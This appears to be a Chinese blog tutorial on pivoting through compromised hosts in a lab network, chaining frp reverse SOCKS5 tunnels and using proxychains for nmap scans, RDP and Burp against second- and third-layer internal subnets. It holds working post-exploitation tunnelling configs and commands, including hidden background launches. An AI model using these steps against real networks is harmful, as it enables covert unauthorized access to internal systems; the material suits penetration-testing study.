frp通过socks5二层代理,访问内网三层网站

Posted 星球守护者

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了frp通过socks5二层代理,访问内网三层网站相关的知识,希望对你有一定的参考价值。

文章目录

0x01背景介绍

假设:已经获取边界服务器(192.168.0.100)的服务器权限,win7服务器(192.168.52.30)的权限
实现:

  • 配置一层代理,访问192.168.52.0/24网段,以便访问第二层网络(192.168.52.30)
  • 配置二层代理,访问192.168.93.0/24网段,以便访问第三层网络(192.168.93.30)
  • 现在 ubuntu(web1)要充当frp客户端frp服务端,以便访问第三层网络

0x02 frp一层代理(反向)

服务端(server)

kali(192.168.0.107)

frps.ini
--------------------------------------
[common]
#服务端监听端口,默认7000。监听来自客户端的流量请求
bind_port = 7000
--------------------------------------
启动
chmod +777 frps
./frps -c ./frps.ini

客户端 (client)

ubuntu-web1(192.168.0.100)

会将客户端中所有的流量通过本地的一个随机端口转发给vps的7000端口,
我们访问vps的7777端口就相当于访问客户端的7000端口
frpc.ini
---------------------
[common]
server_addr = 192.168.0.107
server_port = 7000

[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5
----------------------
启动
chmod +777 frpc
nohup ./frpc -c ./frpc.ini >/dev/null 2>&1 &

先启动服务器,在启动客户端

0x03 frp二层代理

同时启动二层代理的服务端frps
ubuntu-web1(192.168.0.100)

frps.ini
--------------------------------------
[common]
#服务端监听端口,默认7000。监听来自客户端的流量请求
bind_addr = 192.168.52.10
bind_port = 7000
--------------------------------------
启动
chmod +777 frps
./frps -c ./frps.ini

客户端 (client)

web-pc1(192.168.52.30)

会将客户端中所有的流量通过本地的一个随机端口转发给vps的7000端口,
我们访问vps的7777端口就相当于访问客户端的7000端口
frpc.ini
---------------------
[common]
server_addr = 192.168.52.10
server_port = 7000

[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5
----------------------
启动
chmod +777 frpc
nohup ./frpc -c ./frpc.ini >/dev/null 2>&1 &

0x04 测试连接

kali本地添加proxy配置

vim /etc/proxychains4.conf 
----------------------------------
socks5  192.168.0.107 7777
socks5 192.168.52.10 7777
----------------------------------

第一步 通过代理,使用nmap进行扫描

扫描二层网络
proxychains nmap -Pn -sT -sV -F -O 192.168.52.30 


扫描三层网络
 proxychains nmap -Pn -sT -sV -F -O 192.168.93.40

第二步 远程连接

proxychains rdesktop 192.168.52.30


proxychains rdesktop 192.168.93.40

第三步 浏览器开启代理,访问内网系统

访问二层网络
socks5 127.0.0.1 7777
http://192.168.52.30:8080/



访问三层网络
启动burp:
proxychains  burpsuite
firfox代理:
socks5 127.0.0.1 7777
http  127.0.0.1 8080
访问网站:
http://192.168.52.30:8080/
127.0.0.1:7777--firxfox:8080---192.168.52.10:7777---burp127.0.0.0:8080----发送

使用代理启动burp

浏览器开启burp代理

成功访问


查看后台burp的代理包

摘抄

历尽千帆,归来仍是少年。经受风雨,坦荡而真诚,温暖而坚韧。
在生活里,明明白白做人,在工作上,勤勤恳恳努力。
不做玻璃心的花瓶,保持韧性,勤奋、坚持,用一颗真诚的心面对生活,才是一个人走向成功,能够屹立不倒的原因。

以上是关于frp通过socks5二层代理,访问内网三层网站的主要内容,如果未能解决你的问题,请参考以下文章

ew通过socks5一层代理-访问内网二层网络-实战篇

ew通过socks5一层代理-访问内网二层网络-实战篇

红蓝对抗之隧道技术第二篇(reGeorg内网穿透SSH隧道本地Socks代理SSH远程转发Earthworm Socks5代理Tunna正向代理ICMP隧道DNS隧道Frp穿透)

红蓝对抗之隧道技术第二篇(reGeorg内网穿透SSH隧道本地Socks代理SSH远程转发Earthworm Socks5代理Tunna正向代理ICMP隧道DNS隧道Frp穿透)

记一次内网靶机实战

记一次内网靶机实战